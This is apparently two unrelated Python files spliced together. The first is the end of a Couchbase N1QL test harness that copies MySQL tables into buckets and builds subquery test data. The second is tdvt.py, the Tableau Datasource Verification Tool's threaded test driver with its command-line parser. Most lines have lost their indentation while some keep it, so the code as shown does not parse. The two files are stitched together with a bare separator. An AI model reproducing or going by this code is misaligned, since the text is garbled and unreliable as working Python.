self.advise_dict[bucket] = self.advise_buckets[0]
self.advise_buckets.remove(self.advise_buckets[0])
def _setup_and_load_buckets(self):
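        # Mirrors the relational schema into Couchbase: each table becomes a bucket
        # named "<database>_<table>", and every row is read from the SQL backend and
        # bulk-inserted through N1QL (or via load_subquery_test_data for subquery runs).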
# Remove any previous buckets
if self.skip_setup_cleanup:
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
if self.change_bucket_properties or self.gsi_type == "memory_optimized":
bucket_size = 100
else:
bucket_size = None
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 25")
# Pull information about tables from mysql database and interpret them as no-sql dbs
table_key_map = self.client._get_primary_key_map_for_tables()
# Make a list of buckets that we want to create for querying
bucket_list = list(table_key_map.keys())
self.log.info("database used is {0}".format(self.database))
new_bucket_list = []
for bucket in bucket_list:
if bucket.find("copy_simple_table") > 0:
new_bucket_list.append(self.database+"_"+"copy_simple_table")
else:
new_bucket_list.append(self.database + "_" + bucket)
if self.subquery:
break
# Create New Buckets
self.fill_advise_dict(new_bucket_list)
self._create_buckets(self.master, new_bucket_list, server_id=None, bucket_size=bucket_size)
self.log.info("buckets created")
# Wait till the buckets are up
self.sleep(5)
self.buckets = self.rest.get_buckets()
self.newbuckets = []
for bucket in self.buckets:
if bucket.name in new_bucket_list:
self.newbuckets.append(bucket)
self.log.info("safe to start another job")
self.record_db = {}
self.buckets = self.newbuckets
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
query = "select * from {0}".format(bucket_name)
columns, rows = self.client._execute_query(query=query)
self.record_db[bucket_name] = self.client._gen_json_from_results_with_primary_key(columns, rows, primary_key=table_key_map[bucket_name])
if self.subquery:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self.load_subquery_test_data(bucket)
else:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self._load_bulk_data_in_buckets_using_n1ql(bucket, self.record_db[bucket_name])
def _populate_delta_buckets(self, table_name = "simple_table"):
if table_name != "simple_table":
client = self.client_map[table_name]
else:
client = self.client
query = "delete from {0} where primary_key_id is not null".format(table_name)
client._insert_execute_query(query=query)
query = "delete from {0} where primary_key_id is not null".format(self.database+"_"+table_name)
self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server, verbose=True)
insert_sql = "insert into {0}(KEY k ,VALUE b) SELECT meta(b).id as k, b from {1} b where primary_key_id is not null".format(self.database+"_"+table_name,self.database+"_"+"copy_simple_table")
if self.use_advisor:
self.create_secondary_index("SELECT meta(b).id as k, b from {0} b where primary_key_id is not null".format(self.database+"_"+"copy_simple_table"))
try:
self.log.info("n1ql query is {0}".format(insert_sql))
self.n1ql_helper.run_cbq_query(query=insert_sql, server=self.n1ql_server, verbose=True)
insert_sql = "INSERT INTO {0} SELECT * FROM copy_simple_table".format(table_name)
client._insert_execute_query(insert_sql)
except Exception as ex:
self.log.info(ex)
def load_subquery_test_data(self, bucket):
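        # For subquery runs: creates a child simple_table_2 in the relational
        # database, inserts two order rows per simple_table_1 primary key, and
        # writes a matching Couchbase document with those orders nested under a
        # "simple_table_2" array so the N1QL documents line up with the SQL rows.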
query = 'select primary_key_id from simple_table_1'
result = self.client._execute_sub_query(query)
primary_key_values = result
query = 'CREATE TABLE IF NOT EXISTS {0}.`simple_table_2` ' \
'(`order_id` VARCHAR(100) NOT NULL,`qty` INT(11) NULL DEFAULT NULL,`productId` VARCHAR(1000) NOT NULL' \
',`price` DECIMAL(10,0) NOT NULL,`primary_key_id` VARCHAR(100) NOT NULL,PRIMARY KEY (`order_id`),' \
'FOREIGN KEY (`primary_key_id`) REFERENCES `simple_table_1`(`primary_key_id`))'.format(self.database)
self.client._db_execute_query(query)
for primary_key_value in primary_key_values:
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_field = result
query = 'select decimal_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
decimal_field_value = result
query = 'select int_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
int_field_value = result
query = 'select datetime_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
datetime_field_value = result
query = 'select bool_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
bool_field_value = bool(result)
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_value = result
query = 'select char_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
char_value = result
orderid1 = "order-" + varchar_field
orderid2 = "order-" + str(self.query_helper._random_char()) + "_"+str(self.query_helper._random_int()) + varchar_field
price1 = self.query_helper._random_float()+10
price2 = self.query_helper._random_float()+100
qty1 = self.query_helper._random_int()
qty2 = self.query_helper._random_int()
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "snack", %s, %s)' % (orderid1, qty1, price1, primary_key_value)
self.client._insert_execute_query(query)
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "lunch", %s, %s)' % (orderid2, qty2, price2, primary_key_value)
self.client._insert_execute_query(query)
n1ql_insert_template = 'INSERT INTO %s (KEY, VALUE) VALUES ' \
'("%s", {"primary_key_id": "%s" ,"decimal_field1":%s,"int_field1":%s,' \
'"datetime_field1":"%s","bool_field1":%s,"varchar_field1":"%s",' \
'"char_field1":"%s","simple_table_2":[{"order_id":"%s","qty":%s,' \
'"productId":"snack","price":%s,"primary_key_id":"%s"},' \
'{"order_id":"%s","qty":%s,"productId":"lunch","price":%s,' \
'"primary_key_id":"%s"}] } )'\
% (bucket.name, primary_key_value, primary_key_value, decimal_field_value,
int_field_value, datetime_field_value, bool_field_value, varchar_value,
char_value, orderid1, qty1, price1, primary_key_value, orderid2, qty2,
price2, primary_key_value)
self.n1ql_helper.run_cbq_query(query=n1ql_insert_template, server=self.n1ql_server)
def _round_float_results(self, results, round_level=0):
if round_level > 0:
for res in results:
for key in res.keys():
if isinstance(res[key], float):
res[key] = round(res[key], round_level)
return results
|
tdvt.py
|
"""
Test driver script for the Tableau Datasource Verification Tool
"""
import sys
if sys.version_info[0] < 3:
raise EnvironmentError("TDVT requires Python 3 or greater.")
import argparse
import csv
import glob
import hashlib
import json
import logging
import os
import pathlib
import queue
import shutil
import threading
import time
import zipfile
from pathlib import Path
from typing import List, Optional, Tuple, Union
from .config_gen.datasource_list import print_ds, print_configurations, print_logical_configurations
from .config_gen.tdvtconfig import TdvtInvocation
from .config_gen.test_config import TestSet, SingleLogicalTestSet, SingleExpressionTestSet, FileTestSet, TestConfig, RunTimeTestConfig
from .setup_env import create_test_environment, add_datasource
from .tabquery import *
from .tdvt_core import generate_files, run_diff, run_tests, run_connectors_test_core
from .version import __version__
# This contains the dictionary of configs you can run.
from .config_gen.datasource_list import WindowsRegistry, MacRegistry, LinuxRegistry
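# Collects the per-thread result files (CSV rows, JSON results, zipped actuals and logs) into the combined
# output files written to the current working directory.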
class TestOutputFiles(object):
output_actuals = 'tdvt_actuals_combined.zip'
output_tabquery_log = 'tabquery_logs.zip'
output_csv = "test_results_combined.csv"
output_json = "tdvt_output_combined.json"
all_output_files = [output_actuals, output_csv, output_json, output_tabquery_log]
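    # Result rows merged from each thread's test_results.csv; written out by write_test_results_csv().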
combined_output = []
@classmethod
def copy_output_file(c, src_name, src_dir):
src = os.path.join(src_dir, src_name)
logging.debug("Copying {0} to output".format(src))
try:
with open(src, 'r', encoding='utf8') as src_file:
reader = csv.DictReader(src_file, dialect='tdvt')
for row in reader:
c.combined_output.append(row)
except IOError as e:
logging.debug("Exception while copying files: " + str(e))
return
@classmethod
def write_test_results_csv(c):
if not c.combined_output:
logging.debug("write_test_results_csv called with no test output")
return
logging.debug("Copying output to {0}".format(c.output_csv))
# Sort combined_output on the number of distinct functions (order of complexity)
sort_by_complexity = lambda row: len(row['Functions'].split(','))
try:
c.combined_output.sort(key=sort_by_complexity)
except KeyError as e:
logging.debug("Tried to sort output on a key that doesn't exist. Leaving output unsorted.")
dst = os.path.join(os.getcwd(), c.output_csv)
try:
dst_exists = os.path.isfile(dst)
with open(dst, 'w', encoding='utf8') as dst_file:
writer = csv.DictWriter(dst_file, fieldnames=c.combined_output[0],
dialect='tdvt', quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for row in c.combined_output:
writer.writerow(row)
except IOError as e:
logging.debug("Exception while writing to file: " + str(e))
return
def do_test_queue_work(i, q):
"""This will be called in a queue.join() context, so make sure to mark all work items as done and
continue through the loop. Don't try and exit or return from here if there are still work items in the queue.
See the python queue documentation."""
abort_test_run = False
while True:
# This blocks if the queue is empty.
work = q.get()
work.run()
q.task_done()
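# Minimal usage sketch for the worker/queue pattern above (this is what test_runner() below does):
#
#   q = queue.Queue()
#   for runner in work_items:
#       q.put(runner)
#   for i in range(thread_count):
#       threading.Thread(target=do_test_queue_work, args=(i, q), daemon=True).start()
#   q.join()  # returns once every work item has called task_done()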
class TestRunner(threading.Thread):
def __init__(self, test_set: TestSet, test_config: TdvtInvocation, lock, verbose, thread_id):
threading.Thread.__init__(self)
self.test_set = test_set
self.test_config = test_config
self.error_code = 0
self.thread_id = thread_id
self.verbose = verbose
self.thread_lock = lock
self.temp_dir = make_temp_dir([self.test_config.suite_name, str(thread_id)])
self.test_config.output_dir = self.temp_dir
def copy_files_to_zip(self, dst_file_name, src_dir, is_logs):
dst = os.path.join(os.getcwd(), dst_file_name)
mode = 'w' if not os.path.isfile(dst) else 'a'
optional_dir_name = self.test_config.config_file.replace('.', '_')
if is_logs is True:
log_dir = os.path.join(src_dir, optional_dir_name)
glob_path = glob.glob(os.path.join(log_dir, '*.txt'))
glob_path.extend(glob.glob(os.path.join(log_dir, '*.log')))
glob_path.extend(glob.glob(os.path.join(log_dir, 'crashdumps/*')))
else:
glob_path = glob.glob(os.path.join(src_dir, 'actual.*'))
with zipfile.ZipFile(dst, mode, zipfile.ZIP_DEFLATED) as myzip:
for actual in glob_path:
path = pathlib.PurePath(actual)
file_to_be_zipped = path.name
inner_output = os.path.join(optional_dir_name, file_to_be_zipped)
myzip.write(actual, inner_output)
def copy_output_files(self):
TestOutputFiles.copy_output_file("test_results.csv", self.temp_dir)
def copy_test_result_file(self):
src = os.path.join(self.temp_dir, "tdvt_output.json")
dst = os.path.join(os.getcwd(), TestOutputFiles.output_json)
try:
if not os.path.isfile(dst):
shutil.copyfile(src, dst)
else:
src_file = open(src, 'r', encoding='utf8')
results = json.load(src_file)
src_file.close()
dst_file = open(dst, 'r', encoding='utf8')
existing_results = json.load(dst_file)
dst_file.close()
existing_results['failed_tests'].extend(results['failed_tests'])
existing_results['successful_tests'].extend(results['successful_tests'])
existing_results['skipped_tests'].extend(results['skipped_tests'])
existing_results['disabled_tests'].extend(results['disabled_tests'])
# Check the newly succeeding tests, and if they are in the existing failed
# test list, remove them from the failed test list since they now succeed
for element in results['successful_tests']:
for failed in existing_results['failed_tests']:
if element['test_name'] == failed['test_name']:
existing_results['failed_tests'].remove(failed)
dst_file = open(dst, 'w', encoding='utf8')
json.dump(existing_results, dst_file)
dst_file.close()
except IOError:
return
def copy_files_and_cleanup(self):
left_temp_dir = False
try:
self.copy_files_to_zip(TestOutputFiles.output_actuals, self.temp_dir, is_logs=False)
self.copy_files_to_zip(TestOutputFiles.output_tabquery_log, self.temp_dir, is_logs=True)
self.copy_output_files()
self.copy_test_result_file()
except Exception as e:
print(e)
pass
try:
if not self.test_config.leave_temp_dir:
shutil.rmtree(self.temp_dir)
else:
left_temp_dir = True
        except Exception:
pass
return left_temp_dir
def run(self):
# Send output to null.
DEVNULL = open(os.devnull, 'wb')
output = DEVNULL if not self.verbose else None
logging.debug("\nRunning tdvt " + str(self.test_config) + " tdvt thread id: " + str(self.thread_id) + "\n")
print("Running {0} {1} {2}\n".format(self.test_config.suite_name, self.test_config.config_file,
str(self.thread_id)))
start_time = time.time()
self.test_config.thread_id = self.thread_id
failed_tests, skipped_tests, disabled_tests, total_tests = run_tests(self.test_config, self.test_set)
logging.debug("\nFinished tdvt " + str(self.test_config) + "\n")
print("\nFinished {0} {1} {2}\n".format(self.test_config.suite_name, self.test_config.config_file,
str(self.thread_id)))
self.failed_tests = failed_tests
self.skipped_tests = skipped_tests
self.disabled_tests = disabled_tests
self.total_tests = total_tests
def delete_output_files(root_dir):
    for output_file_name in TestOutputFiles.all_output_files:
        out_file = os.path.join(root_dir, output_file_name)
        if os.path.exists(out_file):
            try:
                os.unlink(out_file)
            except Exception as e:
                print(e)
                continue
def get_datasource_registry(platform):
"""Get the datasources to run based on the suite parameter."""
if sys.platform.startswith("darwin"):
reg = MacRegistry()
elif sys.platform.startswith("linux"):
reg = LinuxRegistry()
else:
reg = WindowsRegistry()
return reg
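# Build a single-pattern TestSet (logical or expression) for the 'run-pattern' command. Returns (None, None)
# when the arguments do not describe such a run or when no test files match the pattern.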
def enqueue_single_test(args, ds_info: TestConfig, suite) -> Union[Tuple[None, None], Tuple[Union[SingleLogicalTestSet, SingleExpressionTestSet], TdvtInvocation]]: # noqa: E501
if not args.command == 'run-pattern' or not args.tds_pattern or (args.logical_pattern and args.expression_pattern):
return None, None
test_set = None
if args.logical_pattern:
test_set = SingleLogicalTestSet(suite, get_root_dir(), args.logical_pattern, args.tds_pattern,
args.test_pattern_exclude, ds_info)
else:
test_set = SingleExpressionTestSet(suite, get_root_dir(), args.expression_pattern, args.tds_pattern,
args.test_pattern_exclude, ds_info)
#Only try and run tests if there are some.
if not test_set.generate_test_file_list():
return None, None
tdvt_invocation = TdvtInvocation(from_args=args, test_config=ds_info)
tdvt_invocation.tds = test_set.tds_name
tdvt_invocation.logical = test_set.is_logical
tdvt_invocation.config_file = test_set.config_name
return test_set, tdvt_invocation
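# Load a previous run's JSON results and group the failed tests into FileTestSets, keyed by suite name and by a
# hash of (test directory, tds, test type), so that only those tests are re-run.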
def enqueue_failed_tests(run_file: Path, root_directory, args, rt: RunTimeTestConfig = None):
try:
with run_file.open('r', encoding='utf8') as file:
tests = json.load(file)
except IOError as e:
logging.error("Error opening " + str(run_file) + " error: " + str(e))
return
delete_output_files(os.getcwd())
all_test_configs = {}
all_tdvt_test_configs = {}
all_test_pairs = []
failed_tests = tests['failed_tests']
# Go through the failed tests and group the ones that can be run together in a FileTestSet.
for f in failed_tests:
test_file_path = f['test_file']
expected_message = f['expected_message'] if 'expected_message' in f else ''
test_root_dir = root_directory
tds_base = os.path.split(f['tds'])[1]
tds = get_tds_full_path(root_directory, tds_base)
logging.debug("Found failed test: " + test_file_path + " and tds " + tds)
tdvt_invocation = TdvtInvocation(from_json=f['test_config'])
if rt:
tdvt_invocation.set_run_time_test_config(rt)
tdvt_invocation.tds = tds
tdvt_invocation.leave_temp_dir = is_test(args) and args.noclean if args else False
suite_name = f['test_config']['suite_name']
password_file = f['password_file'] if 'password_file' in f else ''
        # Use a hash of the test file path to distinguish unique test runs (since the config only supports one test path).
        # Otherwise two tests with the same name could show up and the first result file would overwrite the second.
tt = "L" if tdvt_invocation.logical else "E"
test_set_unique_id = hashlib.sha224(
(os.path.split(test_file_path)[0] + "_" + tds_base + "_" + tt).replace("-", "_").encode())
test_set_unique_id = test_set_unique_id.hexdigest()
test_set_config = None
if not suite_name in all_test_configs:
all_test_configs[suite_name] = {}
if not test_set_unique_id in all_test_configs[suite_name]:
tdvt_invocation.output_dir = make_temp_dir([test_set_unique_id])
all_tdvt_test_configs[test_set_unique_id] = tdvt_invocation
run_time_config = RunTimeTestConfig(60*60, 1)
test_set_config = TestConfig(suite_name, '', run_time_config)
all_test_configs[suite_name][test_set_unique_id] = test_set_config
else:
test_set_config = all_test_configs[suite_name][test_set_unique_id]
current_test_set = None
if tdvt_invocation.logical:
current_test_set = test_set_config.get_logical_tests(test_set_unique_id)
else:
current_test_set = test_set_config.get_expression_tests(test_set_unique_id)
if current_test_set and len(current_test_set) == 1:
current_test_set = current_test_set[0]
if not current_test_set:
current_test_set = FileTestSet(suite_name, test_root_dir, test_set_unique_id, tds, tdvt_invocation.logical, suite_name,
password_file, expected_message)
if tdvt_invocation.logical:
test_set_config.add_logical_testset(current_test_set)
else:
test_set_config.add_expression_testset(current_test_set)
current_test_set.append_test_file(test_file_path)
for suite_names in all_test_configs:
for test_set_id in all_test_configs[suite_names]:
test_set_config = all_test_configs[suite_names][test_set_id]
for each_test_set in test_set_config.get_logical_tests() + test_set_config.get_expression_tests():
tdvt_invocation = all_tdvt_test_configs[test_set_id]
all_test_pairs.append((each_test_set, tdvt_invocation))
logging.debug("Queuing up tests: " + str(tdvt_invocation))
return all_test_pairs
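# Collect the logical and/or expression TestSets configured for a datasource and pair each one with a TdvtInvocation.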
def enqueue_tests(ds_info, args, suite):
tests = []
test_set_configs = []
if not is_test(args):
return test_set_configs
logging.debug("Enqueing tests for " + ds_info.dsname)
if args.logical_only or args.expression_only:
if args.logical_only:
tests.extend(ds_info.get_logical_tests(args.logical_only))
if args.expression_only:
tests.extend(ds_info.get_expression_tests(args.expression_only))
else:
tests.extend(ds_info.get_logical_tests(args.logical_only))
tests.extend(ds_info.get_expression_tests(args.expression_only))
# Make sure there are tests.
if not tests:
logging.error("No tests found")
return test_set_configs
for x in tests:
if not x.generate_test_file_list():
logging.error("No tests found for config " + str(x))
return test_set_configs
for test_set in tests:
tdvt_invocation = TdvtInvocation(from_args=args, test_config = ds_info)
tdvt_invocation.logical = test_set.is_logical_test()
tdvt_invocation.tds = test_set.tds_name
tdvt_invocation.config_file = test_set.config_name
test_set_configs.append((test_set, tdvt_invocation))
return test_set_configs
def get_level_of_parallelization(args):
# This indicates how many database/test suite combinations to run at once
max_threads = 6
if is_test(args) and args.thread_count:
max_threads = args.thread_count
max_threads = get_max_process_level_of_parallelization(max_threads)
print("Setting tdvt thread count to: " + str(max_threads))
return max_threads
list_usage_text = '''
Show all test suites or list the contents of a specific suite.
'''
list_logical_usage_text = '''
Show logical configs. The argument can be empty to list all, or you can specify a config by name.
'''
run_usage_text = '''
The 'run' argument can take a single datasource, a list of data sources, or a test suite name in any combination.
run postgres_odbc,postgres_jdbc
The 'run' argument can also take the --verify flag to run a connection test against tests with SmokeTest = True set.
run postgres_odbc --verify
Both logical and expression tests are run by default.
Run all expression tests
run postgres_odbc -e
Run all logical tests
run postgres_odbc -q
There are multiple suites of expression tests, for example, standard and LOD (level of detail). The config files that drive the tests
are named expression_test.sqlserver.cfg and expression.lod.sqlserver.cfg.
To run just one of those try entering part of the config name as an argument:
run postgres_odbc -e lod
'''
run_pattern_usage_text = '''
Run one expression test against many datasources
run-pattern postgres_odbc --exp exprtests/standard/setup.date.datepart.second*.txt --tdp cast_calcs.*.tds
Run one logical query test against many datasources
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.B1713.?.xml --tdp cast_calcs.*.tds
The 'exp' argument is a glob pattern that is used to find the test file using the relative test path.
The 'test-ex' argument can be used to exclude test files. This is a regular expression pattern.
The tds pattern is used to find the tds. Use a '*' character where the tds name will be substituted,
ie cast_calcs.*.tds
This can be combined with * to run an arbitrary set of 'correct' logical query tests against a datasource
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.?.xml --tdp cast_calcs.*.tds
Alternatively
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.dbo.xml --tdp cast_calcs.*.tds
But skip 59740?
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.dbo.xml --tdp cast_calcs.*.tds --test-ex 59740
'''
run_connectors_test_usage_text = '''
The commands below can be used to run the connectors tests.
'filepath.xml' in the commands below is the path of the XML test file used to run the tests.
'passwordfilepath.password' in the commands below is the path of the password file used for the ServerVersionTest.
Run ConnectionBuilderTest
run-connectors-test --conn-test connectionBuilder --conn-test-file filepath.xml
Run NormalizeConnectionAttributes Test
run-connectors-test --conn-test normalizeConnectionAttributes --conn-test-file filepath.xml
Run MatchesConnectionAttributesTest
run-connectors-test --conn-test matchesConnectionAttributes --conn-test-file filepath.xml
Run PropertiesBuilderTest
run-connectors-test --conn-test propertiesBuilder --conn-test-file filepath.xml
Run ServerVersionTest
run-connectors-test --conn-test serverVersion --conn-test-file filepath.xml --conn-test-password-file passwordfilepath.password
'''
action_usage_text = '''
'''
run_file_usage_text = '''
'''
def create_parser():
parser = argparse.ArgumentParser(description='TDVT - Tableau Datasource Verification Tool.')
parser.add_argument('--verbose', dest='verbose', action='store_true', help='Verbose output.', required=False)
#Common run test options.
run_test_common_parser = argparse.ArgumentParser(description='Common test run options.', add_help=False)
run_test_common_parser.add_argument('--threads', '-t', dest='thread_count', type=int, help='Max number of threads to use.', required=False)
run_test_common_parser.add_argument('--no-clean', dest='noclean', action='store_true', help='Leave temp dirs.', required=False)
run_test_common_parser.add_argument('--generate', dest='generate', action='store_true', help='Generate logical query test files.', required=False)
run_test_common_parser.add_argument('--compare-sql', dest='compare_sql', action='store_true', help='Compare SQL.', required=False)
run_test_common_parser.add_argument('--nocompare-tuples', dest='nocompare_tuples', action='store_true', help='Do not compare Tuples.', required=False)
run_test_common_parser.add_argument('--compare-error', dest='compare_error', action='store_true', help='Compare error.', required=False)
subparsers = parser.add_subparsers(help='commands', dest='command')
#Get information.
list_parser = subparsers.add_parser('list', help='List information about datasource tests and suites.', usage=list_usage_text)
list_parser.add_argument(dest='list_ds', help='List datasource config.', default='', nargs='?')
list_logical_parser = subparsers.add_parser('list-logical-configs', help='List information about logical configurations.', usage=list_logical_usage_text)
list_logical_parser.add_argument(dest='list_logical_configs', help='List available logical configs.', default='', nargs='?')
#Actions.
action_group = subparsers.add_parser('action', help='Various non-test actions.', usage=action_usage_text)
action_group.add_argument('--setup', dest='setup', action='store_true', help='Create setup directory structure.', required=False)
action_group.add_argument('--add_ds', dest='add_ds', help='Add a new datasource.', required=False)
action_group.add_argument('--diff-test', '-dd', dest='diff', help='Diff the results of the given test (ie exprtests/standard/setup.calcs_data.txt) against the expected files. Can be used with the sql and tuple options.', required=False)
action_group.add_argument('--generate', dest='action_generate', action='store_true', help='Generate logical query test files.', required=False)
#Run tests.
run_test_parser = subparsers.add_parser('run', help='Run tests.', parents=[run_test_common_parser], usage=run_usage_text)
run_test_parser.add_argument('ds', help='Comma separated list of Datasource names or groups to test. See the \'list\' command.', nargs='+')
run_test_parser.add_argument('--verify', dest='smoke_test', action='store_true', help='Verifies the connection to a data source against tests in your .ini file with SmokeTest = True.', required=False) # noqa: E501
run_test_parser.add_argument('--force-run', dest='force_run', action='store_true', help='Attempts to run the tests for a data source, even if its smoke tests fail.')
run_test_parser.add_argument('--logical', '-q', dest='logical_only', help='Only run logical tests whose config file name matches the supplied string, or all if blank.', required=False, default=None, const='*', nargs='?')
    run_test_parser.add_argument('--expression', '-e', dest='expression_only', help='Only run expression tests whose config file name matches the supplied string, or all if blank.', required=False, default=None, const='*', nargs='?')
#Run test pattern.
run_test_pattern_parser = subparsers.add_parser('run-pattern', help='Run individual tests using a pattern.', parents=[run_test_common_parser], usage=run_pattern_usage_text)
run_test_pattern_parser.add_argument('ds', help='Comma separated list of Datasource names or groups to test. See the \'list\' command.', nargs='+')
run_test_group = run_test_pattern_parser.add_mutually_exclusive_group(required=True)
    run_test_group.add_argument('--exp', dest='expression_pattern', help='Only run expression tests whose name and path match the supplied string. This is a glob pattern. Also you must set the tds-pattern to use when running the test.', required=False, default=None, const='', nargs='?')
    run_test_group.add_argument('--logp', dest='logical_pattern', help='Only run logical tests whose name and path match the supplied string. This is a glob pattern. Also you must set the tds-pattern to use when running the test. Use a ? to replace the logical query config component of the test name.', required=False, default=None, const='', nargs='?')
run_test_pattern_parser.add_argument('--tdp', dest='tds_pattern', help='The datasource tds pattern to use when running the test. See exp and logp arguments.', required=True, default=None, const='', nargs='?')
run_test_pattern_parser.add_argument('--test-ex', dest='test_pattern_exclude', help='Exclude tests whose name matches the supplied string. This is a regular expression pattern. Can be used with exp and logp arguments. Also set the tds-pattern to use when running the test.', required=False, default=None, const='', nargs='?')
#Run file.
run_file_parser = subparsers.add_parser('run-file', help='Run tests from a file.', parents=[run_test_common_parser], usage=run_file_usage_text)
run_file_parser.add_argument('run_file', help='Json file containing failed tests to run.')
#Run Connectors Test
run_connectors_test_parser = subparsers.add_parser('run-connectors-test', help='Run a connectors test using a file', parents=[run_test_common_parser], usage=run_connectors_test_usage_text)
run_connectors_test_parser.add_argument('--conn-test', dest='conn_test', help='Name of the Connectors Test to run.', required=True)
run_connectors_test_parser.add_argument('--conn-test-file', dest='conn_test_file', help='Path to the setup-expected file to run the connectors test', required=True)
run_connectors_test_parser.add_argument('--conn-test-password-file', dest='conn_test_password_file', help='Path to the password file used for the ServerVersionTest')
return parser
def register_tdvt_dialect():
    # Define a dedicated dialect class instead of mutating csv.excel's attributes globally.
    class TdvtDialect(csv.excel):
        lineterminator = '\n'
        delimiter = ','
        strict = True
        skipinitialspace = True
    csv.register_dialect('tdvt', TdvtDialect)
def init():
parser = create_parser()
args = parser.parse_args()
# Create logger.
logging.basicConfig(filename='tdvt_log_combined.txt', level=logging.DEBUG, filemode='w',
format='%(asctime)s %(message)s')
logger = logging.getLogger()
ch = logging.StreamHandler()
if 'verbose' in args and args.verbose:
# Log to console also.
ch.setLevel(logging.DEBUG)
else:
args.verbose = False
ch.setLevel(logging.WARNING)
logger.addHandler(ch)
logging.debug('TDVT version: ' + str(__version__))
logging.debug('TDVT Arguments: ' + str(args))
ds_reg = get_datasource_registry(sys.platform)
configure_tabquery_path()
register_tdvt_dialect()
return parser, ds_reg, args
def is_test(args):
return args.command in ['run', 'run-pattern', 'run-file', 'run-connectors-test']
def active_thread_count(threads):
active = 0
for t in threads:
if t.is_alive():
active += 1
return active
def test_runner(all_tests, test_queue, max_threads):
for i in range(0, max_threads):
worker = threading.Thread(target=do_test_queue_work, args=(i, test_queue))
        worker.daemon = True
worker.start()
test_queue.join()
failed_tests = 0
skipped_tests = 0
disabled_tests = 0
total_tests = 0
for work in all_tests:
if work.copy_files_and_cleanup():
print("Left temp dir: " + work.temp_dir)
failed_tests += work.failed_tests if work.failed_tests else 0
skipped_tests += work.skipped_tests if work.skipped_tests else 0
disabled_tests += work.disabled_tests if work.disabled_tests else 0
total_tests += work.total_tests if work.total_tests else 0
TestOutputFiles.write_test_results_csv()
return failed_tests, skipped_tests, disabled_tests, total_tests
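# Run any smoke tests first, then push the remaining TestRunner work items through the worker threads,
# aggregate the failed/skipped/disabled/total counts and print a summary.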
def run_tests_impl(tests: List[Tuple[TestSet, TdvtInvocation]], max_threads: int, args) -> Optional[Tuple[int, int, int, int]]:
if not tests:
print("No tests found. Check arguments.")
sys.exit()
smoke_test_queue = queue.Queue()
smoke_tests = []
test_queue = queue.Queue()
all_work = []
lock = threading.Lock()
for test_set, test_config in tests:
runner = TestRunner(test_set, test_config, lock, args.verbose, len(all_work) + 1)
if test_set.smoke_test:
smoke_tests.append(runner)
smoke_test_queue.put(runner)
else:
all_work.append(runner)
logging.debug("smoke test queue size is: " + str(len(smoke_tests)))
logging.debug("test queue size is: " + str(len(all_work)))
require_smoke_test = args.command == 'run' and args.smoke_test
force_run = args.command == 'run' and args.force_run
if not smoke_tests:
logging.warning("No smoke tests detected.")
if require_smoke_test:
sys.exit(1)
else:
logging.warning("Tests will run without verifying the data source connection.")
if not all_work and not smoke_tests:
print("No tests found. Check arguments.")
sys.exit()
failing_ds = set()
failed_smoke_tests = 0
skipped_smoke_tests = 0
disabled_smoke_tests = 0
total_smoke_tests = 0
smoke_tests_run = 0
absolute_start_time = time.time()
smoke_test_run_time = 0
if smoke_tests:
smoke_test_threads = min(len(smoke_tests), max_threads)
print("Starting smoke tests. Creating", str(smoke_test_threads), "worker threads.\n")
failed_smoke_tests, skipped_smoke_tests, disabled_smoke_tests, total_smoke_tests = test_runner(
smoke_tests, smoke_test_queue, smoke_test_threads)
smoke_tests_run = total_smoke_tests - disabled_smoke_tests
print("{} smoke test(s) ran. {} smoke tests disabled.".format(smoke_tests_run, disabled_smoke_tests))
smoke_test_run_time = round(time.time() - absolute_start_time, 2)
print("Smoke tests ran in {} seconds.".format(smoke_test_run_time))
if failed_smoke_tests > 0:
print("{} smoke test(s) failed. Please check logs for information.".format(failed_smoke_tests))
failing_ds = set(item.test_set.ds_name for item in smoke_tests if item.failed_tests > 0)
if require_smoke_test:
print("\nSmoke tests failed, exiting.")
sys.exit(1)
if require_smoke_test:
print("\nSmoke tests finished. Exiting.")
sys.exit(0)
if failing_ds and not force_run:
print("Tests for the following data source(s) will not be run: {}".format(', '.join(failing_ds)))
final_work = []
for item in all_work:
if not force_run:
if item.test_set.ds_name in failing_ds:
item.test_set.test_is_skipped = True
final_work.append(item)
test_queue.put(item)
print("\nStarting tests. Creating " + str(max_threads) + " worker threads.")
start_time = time.time()
failed_tests, skipped_tests, disabled_tests, total_tests = test_runner(final_work, test_queue, max_threads)
failed_tests += failed_smoke_tests
skipped_tests += skipped_smoke_tests
disabled_tests += disabled_smoke_tests
total_tests += total_smoke_tests
total_tests_run = total_tests - disabled_tests - skipped_tests
total_passed_tests = total_tests_run - failed_tests
now_time = time.time()
main_test_time = round(now_time - start_time, 2)
total_run_time = round(now_time - absolute_start_time, 2)
print('\nTest Count: {} tests'.format(total_tests))
print("\tPassed tests: {}".format(total_passed_tests))
print("\tFailed tests: " + str(failed_tests))
